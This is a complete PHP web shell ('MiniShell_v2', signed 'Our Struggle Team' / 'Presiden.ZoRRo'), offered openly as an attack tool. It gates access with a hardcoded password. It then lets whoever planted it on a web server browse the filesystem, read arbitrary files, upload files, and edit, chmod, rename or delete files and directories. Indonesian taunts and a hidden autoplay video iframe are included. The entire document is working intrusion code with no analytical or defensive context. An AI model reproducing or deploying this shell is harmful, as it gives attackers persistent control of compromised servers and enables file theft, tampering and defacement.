LIST SHELL OUR STRUGGLE TEAM

1. <?php
2.  
3. // --- pop-up
4.  
5. $user = "presiden";
6.  
7. $pass = "zorro";
8.  
9. if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))
10.  
11. {
12.  
13. header("WWW-Authenticate: Basic realm=\"dvildance was here\"");
14.  
15. header("HTTP/1.0 401 Unauthorized");
16.  
17. exit();
18.  
19. }
20.  
21. // --- php shell
22.  
23. error_reporting(0);
24. set_time_limit(0);
25.  
26. if(get_magic_quotes_gpc()){
27. foreach($_POST as $key=>$value){
28. $_POST[$key] = stripslashes($value);
29. }
30. }
31. echo '<!DOCTYPE HTML>
32. <html>
33.  
34. <center>
35. <img class="irc_mi" src="http://image.ibb.co/jnHddk/pres.png" onload="google.aft&&google.aft(this)" width="300" height="300" style="margin-top: 47px;" alt="Hasil gambar untuk error violence">
36.  
37.  
38. <head>
39. <link href="" rel="stylesheet" type="text/css">
40. <title>MiniShell_v2</title>
41. <style>
42. body{
43. font-family: "Racing Sans One", cursive;
44. background-color: black;
45. color:white;
46. }
47. #content tr:hover{
48. background-color: red;
49. text-shadow:0px 0px 10px #fff;
50. }
51. #content .first{
52. background-color: red;
53. }
54. table{
55. border: 1px #000000 dotted;
56. }
57. a{
58. color:white;
59. text-decoration: none;
60. }
61. a:hover{
62. color:blue;
63. text-shadow:0px 0px 10px #ffffff;
64. }
65. input,select,textarea{
66. border: 1px #000000 solid;
67. -moz-border-radius: 5px;
68. -webkit-border-radius:5px;
69. border-radius:5px;
70. }
71. </style>
72. </head>
73. <body>
74. <body background="https://pbs.twimg.com/media/C3nRrEfUEAAluiB.jpg">
75. <h1><center><font color="red">Our Struggle Team</font></center></h1>
76. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
77. <tr><td><font color="#fc1616">Path :</font> ';
78. if(isset($_GET['path'])){
79. $path = $_GET['path'];
80. }else{
81. $path = getcwd();
82. }
83. $path = str_replace('\\','/',$path);
84. $paths = explode('/',$path);
85.  
86. foreach($paths as $id=>$pat){
87. if($pat == '' && $id == 0){
88. $a = true;
89. echo '<a href="?path=/">/</a>';
90. continue;
91. }
92. if($pat == '') continue;
93. echo '<a href="?path=';
94. for($i=0;$i<=$id;$i++){
95. echo "$paths[$i]";
96. if($i != $id) echo "/";
97. }
98. echo '">'.$pat.'</a>/';
99. }
100. echo '</td></tr><tr><td>';
101. if(isset($_FILES['file'])){
102. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
103. echo '<font color="lime">Upload Berhasil</font><br />';
104. }else{
105. echo '<font color="blue">Mampus Gagal :v</font><br/>';
106. }
107. }
108. echo '<form enctype="multipart/form-data" method="POST">
109. <font color="#77ff49">File Upload :</font> <input type="file" name="file" />
110. <input type="submit" value="upload" />
111. </form>
112. </td></tr>';
113. if(isset($_GET['filesrc'])){
114. echo "<tr><td>Current File : ";
115. echo $_GET['filesrc'];
116. echo '</tr></td></table><br />';
117. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
118. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
119. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
120. if($_POST['opt'] == 'chmod'){
121. if(isset($_POST['perm'])){
122. if(chmod($_POST['path'],$_POST['perm'])){
123. echo '<font color="yellow">berhasil hore :)</font><br/>';
124. }else{
125. echo '<font color="blue">gagal lagi -_-</font><br />';
126. }
127. }
128. echo '<form method="POST">
129. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
130. <input type="hidden" name="path" value="'.$_POST['path'].'">
131. <input type="hidden" name="opt" value="chmod">
132. <input type="submit" value="Go" />
133. </form>';
134. }elseif($_POST['opt'] == 'rename'){
135. if(isset($_POST['newname'])){
136. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
137. echo '<font color="lime">nice</font><br/>';
138. }else{
139. echo '<font color="blue">muka lu kaya kontol</font><br />';
140. }
141. $_POST['name'] = $_POST['newname'];
142. }
143. echo '<form method="POST">
144. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
145. <input type="hidden" name="path" value="'.$_POST['path'].'">
146. <input type="hidden" name="opt" value="rename">
147. <input type="submit" value="Go" />
148. </form>';
149. }elseif($_POST['opt'] == 'edit'){
150. if(isset($_POST['src'])){
151. $fp = fopen($_POST['path'],'w');
152. if(fwrite($fp,$_POST['src'])){
153. echo '<font color="lime">Berhasil oke</font><br/>';
154. }else{
155. echo '<font color="red">wkwkwk gagal :v</font><br/>';
156. }
157. fclose($fp);
158. }
159. echo '<form method="POST">
160. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
161. <input type="hidden" name="path" value="'.$_POST['path'].'">
162. <input type="hidden" name="opt" value="edit">
163. <input type="submit" value="Save" />
164. </form>';
165. }
166. echo '</center>';
167. }else{
168. echo '</table><br/><center>';
169. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
170. if($_POST['type'] == 'dir'){
171. if(rmdir($_POST['path'])){
172. echo '<font color="white">Directory Terhapus</font><br/>';
173. }else{
174. echo '<font color="red">kurang ganteng :v </font><br/>';
175. }
176. }elseif($_POST['type'] == 'file'){
177. if(unlink($_POST['path'])){
178. echo '<font color="white">done</font><br/>';
179. }else{
180. echo '<font color="red">gak bisa di apus bang :v</font><br/>';
181. }
182. }
183. }
184. echo '</center>';
185. $scandir = scandir($path);
186. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
187. <tr class="first">
188. <td><center>Name</peller></center></td>
189. <td><center>Size</peller></center></td>
190. <td><center>Permission</peller></center></td>
191. <td><center>Modify</peller></center></td>
192. </tr>';
193.  
194. foreach($scandir as $dir){
195. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
196. echo '<tr>
197. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
198. <td><center>--</center></td>
199. <td><center>';
200. if(is_writable($path.'/'.$dir)) echo '<font color="blue">';
201. elseif(!is_readable($path.'/'.$dir)) echo '<font color="blue">';
202. echo perms($path.'/'.$dir);
203. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
204.  
205. echo '</center></td>
206. <td><center><form method="POST" action="?option&path='.$path.'">
207. <select name="opt">
208. <option value="">Select</option>
209. <option value="delete">Delete</option>
210. <option value="chmod">Chmod</option>
211. <option value="rename">Rename</option>
212. </select>
213. <input type="hidden" name="type" value="dir">
214. <input type="hidden" name="name" value="'.$dir.'">
215. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
216. <input type="submit" value=">">
217. </form></center></td>
218. </tr>';
219. }
220. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
221. foreach($scandir as $file){
222. if(!is_file($path.'/'.$file)) continue;
223. $size = filesize($path.'/'.$file)/1024;
224. $size = round($size,3);
225. if($size >= 1024){
226. $size = round($size/1024,2).' MB';
227. }else{
228. $size = $size.' KB';
229. }
230.  
231. echo '<tr>
232. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
233. <td><center>'.$size.'</center></td>
234. <td><center>';
235. if(is_writable($path.'/'.$file)) echo '<font color="blue">';
236. elseif(!is_readable($path.'/'.$file)) echo '<font color="blue">';
237. echo perms($path.'/'.$file);
238. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
239. echo '</center></td>
240. <td><center><form method="POST" action="?option&path='.$path.'">
241. <select name="opt">
242. <option value="">Select</option>
243. <option value="hapus">Delete</option>
244. <option value="comot">Chmod</option>
245. <option value="ubah nama">Rename</option>
246. <option value="edit">Edit</option>
247. </select>
248. <input type="hidden" name="type" value="file">
249. <input type="hidden" name="name" value="'.$file.'">
250. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
251. <input type="submit" value=">">
252. </form></center></td>
253.  19.18 15/10/2017</tr>';
254. }
255. echo '</table>
256. </div>';
257. }
258. echo '<center><br/>By. *./Presiden.ZoRRo*</center>
259. </body>
260. </html>';
261. function perms($file){
262. $perms = fileperms($file);
263.  
264. if (($perms & 0xC000) == 0xC000) {
265. // Socket
266. $info = 's';
267. } elseif (($perms & 0xA000) == 0xA000) {
268. // Symbolic Link
269. $info = 'l';
270. } elseif (($perms & 0x8000) == 0x8000) {
271. // Regular
272. $info = '-';
273. } elseif (($perms & 0x6000) == 0x6000) {
274. // Block special
275. $info = 'b';
276. } elseif (($perms & 0x4000) == 0x4000) {
277. // Directory
278. $info = 'd';
279. } elseif (($perms & 0x2000) == 0x2000) {
280. // Character special
281. $info = 'c';
282. } elseif (($perms & 0x1000) == 0x1000) {
283. // FIFO pipe
284. $info = 'p';
285. } else {
286. // Unknown
287. $info = 'u';
288. }
289.  
290. // Owner
291. $info .= (($perms & 0x0100) ? 'r' : '-');
292. $info .= (($perms & 0x0080) ? 'w' : '-');
293. $info .= (($perms & 0x0040) ?
294. (($perms & 0x0800) ? 's' : 'x' ) :
295. (($perms & 0x0800) ? 'S' : '-'));
296.  
297. // Group
298. $info .= (($perms & 0x0020) ? 'r' : '-');
299. $info .= (($perms & 0x0010) ? 'w' : '-');
300. $info .= (($perms & 0x0008) ?
301. (($perms & 0x0400) ? 's' : 'x' ) :
302. (($perms & 0x0400) ? 'S' : '-'));
303.  
304. // World
305. $info .= (($perms & 0x0004) ? 'r' : '-');
306. $info .= (($perms & 0x0002) ? 'w' : '-');
307. $info .= (($perms & 0x0001) ?
308. (($perms & 0x0200) ? 't' : 'x' ) :
309. (($perms & 0x0200) ? 'T' : '-'));
310.  
311. return $info;
312. }
313. ?>
314. <iframe width="1" height="1" src="https://www.youtube.com/embed/llxt1iLUK6c?autoplay=1&list=PLLjmxLK8T7PxEm-_dyDk2QgLAPTTMjhk3&loop=1&volume=150" frameborder="0" allowfullscreen></iframe>
315. <head>